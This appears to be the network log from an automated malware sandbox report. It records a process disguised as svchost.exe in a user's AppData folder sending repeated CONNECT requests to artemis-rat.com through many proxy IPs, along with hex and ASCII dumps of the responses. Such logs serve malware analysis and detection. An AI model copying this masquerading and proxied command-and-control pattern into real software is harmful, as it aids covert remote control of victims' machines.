                                                                                    2134192.168.2.556579130.162.213.175312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.874063969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.212101936 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2135192.168.2.556534222.223.103.232730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.876539946 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:29.239834070 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2136192.168.2.555524146.59.18.2464097543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.878792048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.646058083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2137192.168.2.55698243.157.51.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.879622936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2138192.168.2.55698343.157.51.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.880897999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2139192.168.2.55698543.157.51.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.881655931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2140192.168.2.555522188.164.196.315327643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.881926060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677061081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2141192.168.2.55698743.157.51.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.882234097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2142192.168.2.556570116.62.147.249312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.883546114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.214411020 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2143192.168.2.556824203.30.191.348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.887295961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.041461945 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2144192.168.2.55565392.204.134.38778543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.893094063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.145889997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146404028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2145192.168.2.556720162.243.102.207976443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.894903898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2146192.168.2.556846104.16.108.428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.898092031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.052306890 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2147192.168.2.556855104.16.25.2168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.904045105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.058458090 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2148192.168.2.55661277.91.74.778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.915702105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.252578020 CET129INHTTP/1.1 301 Moved Permanently
                                                                                    Location: https://artemis-rat.com:443
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2149192.168.2.556562190.128.228.1828043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.920171976 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:29.284703016 CET1286INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Set-Cookie: PHPSESSID=12d046jnq5gpeh6ed86h14cuti; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Length: 5101
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                    Mar 9, 2024 13:14:29.284719944 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                    Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                    Mar 9, 2024 13:14:29.284861088 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                    Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                    Mar 9, 2024 13:14:29.284878969 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                    Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                    Mar 9, 2024 13:14:29.285059929 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                    Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                    Mar 9, 2024 13:14:29.285185099 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 a3 9a 71 3e e1 fb 8a 7a 82 ad 5f 4c 44 6a 7a 62 06 14 7e 92 3d 72 09 4c 9f 53 9d 18 5d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheRq>z_LDjzb~=rLS]*,+0/$#('=<5/artemis-rat.com#pCi|Es[Wbtk`@E{(^Vm\ *WO2]-IeE
                                                                                    Mar 9, 2024 13:14:29.643045902 CET494INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Content-Length: 312
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
